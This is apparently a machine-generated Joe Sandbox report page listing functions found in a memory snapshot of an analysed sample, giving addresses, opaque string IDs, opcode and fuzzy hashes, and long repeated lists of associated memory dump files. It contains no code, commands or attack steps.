                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
                                                                                          • API String ID: 0-3385986306
                                                                                          • Opcode ID: 8371ee66e64a4e8842674acbb49de53691a9809fbba8010f2f87db5d1c77bf15
                                                                                          • Instruction ID: 4190ce47a1fd5d53ad13a7f6e5aceab9ef25a52f08cbd9d1a183ba445e6762fe
                                                                                          • Opcode Fuzzy Hash: 8371ee66e64a4e8842674acbb49de53691a9809fbba8010f2f87db5d1c77bf15
                                                                                          • Instruction Fuzzy Hash: A282C471A093818FC719CE28C69039BBBE1BB85304F18C96EE4D997391D3B8DD45CB86
                                                                                          Function 00493770 Relevance: 9.5, Strings: 7, Instructions: 748COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: KI$;II$JJI$LCI$PII$b6I$DI
                                                                                          • API String ID: 0-2116176574
                                                                                          • Opcode ID: 65c47d45df86913ef38f1ddbfd8ba2c8f8ed99c61ba1f927fc4b4631e77d9f5b
                                                                                          • Instruction ID: af1ace9a6d1076eeb7c2189050beb8a2352cab1463604713cf56651433f4907a
                                                                                          • Opcode Fuzzy Hash: 65c47d45df86913ef38f1ddbfd8ba2c8f8ed99c61ba1f927fc4b4631e77d9f5b
                                                                                          • Instruction Fuzzy Hash: B2728FB0508F808ED3268F3C8845797BFD5AB5A314F188A6ED0EE873D2C7B96505C766
                                                                                          Function 0049702F Relevance: 9.5, Strings: 7, Instructions: 730COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "uI$2yI$3768$:?-)$InA>$i7b0$~x||
                                                                                          • API String ID: 0-360038573
                                                                                          • Opcode ID: 05d4d888b6254113b1e66ab4a44fe70c0105bdb77b3960477178ea3426ba4001
                                                                                          • Instruction ID: 588cbe3c59b79e022c2d572c0a52731f53282abe1ab50778504afbdfb9be80f3
                                                                                          • Opcode Fuzzy Hash: 05d4d888b6254113b1e66ab4a44fe70c0105bdb77b3960477178ea3426ba4001
                                                                                          • Instruction Fuzzy Hash: 46320072A18311CFD714CF28DC8162ABBE5FB89310F198A7DE985973A0D778E811CB85
                                                                                          Function 0048ED48 Relevance: 9.3, Strings: 7, Instructions: 573COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: [lT$ H$?c;}$iX)$ij$ZlT$]Z[
                                                                                          • API String ID: 0-4280902838
                                                                                          • Opcode ID: 7ed60dc9a06f979207a85483ffbd187b2f510a4945f41496ba3893f2075de21f
                                                                                          • Instruction ID: 8c69e8c3b85ad40de87f72d81b34076e7796ffd33b4fc48323a6b8f2c6f0afe1
                                                                                          • Opcode Fuzzy Hash: 7ed60dc9a06f979207a85483ffbd187b2f510a4945f41496ba3893f2075de21f
                                                                                          • Instruction Fuzzy Hash: E432C1B1600701CFC724DF29C49162ABBF2FF95314B19CA6ED4968BB92D738E845CB94
                                                                                          Function 0063A3B6 Relevance: 9.2, Strings: 6, Instructions: 1699COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: *9ym$QF?$`EP}$y\o~$#Z$|_=
                                                                                          • API String ID: 0-4142179701
                                                                                          • Opcode ID: d006cd02d65a2cea60ca31941fece47e481ea7f40ebc6e28bcff79b514b3523e
                                                                                          • Instruction ID: 5f8dc6ef8167e7366b19a660386e69f64e7782b56cef18bb3c2663600b4bc497
                                                                                          • Opcode Fuzzy Hash: d006cd02d65a2cea60ca31941fece47e481ea7f40ebc6e28bcff79b514b3523e
                                                                                          • Instruction Fuzzy Hash: 2EB248F3A0C2049FE3046E2DEC8567AFBE9EF94720F1A453DEAC4C7744EA3558058696
                                                                                          Function 0047DA80 Relevance: 9.1, Strings: 7, Instructions: 355COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @ffI$BC02FCD6C80496ACB65E466FA2C3ADFE$itkj$q`h}$xy$yleh$uw
                                                                                          • API String ID: 0-1013037425
                                                                                          • Opcode ID: d0ab14ef961f87c292820218db201db2781a9e86216fa30409d63ecf405ffd97
                                                                                          • Instruction ID: 2d3a79cd3d09fce7cee746ef6da28dff70190ee099a263b665b5a8922f0f1de2
                                                                                          • Opcode Fuzzy Hash: d0ab14ef961f87c292820218db201db2781a9e86216fa30409d63ecf405ffd97
                                                                                          • Instruction Fuzzy Hash: DEC1F1B06083849FD314DF25D8857AFBBE1EF96308F14892DE1D98B392D6788509CB96
                                                                                          Function 004A08B1 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 285COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(C5A2897E), ref: 004A0B86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID: lcw|<a$o~{q$w|<a${{up
                                                                                          • API String ID: 3664257935-3972657743
                                                                                          • Opcode ID: 2fdb716fb734336c641400e989a2ccb28f128cb9f6315dcb1059d3878b0cac65
                                                                                          • Instruction ID: 07138dc39de0be2698a92a8f52a1fa011958647e3a988ad4d4fda829288976c1
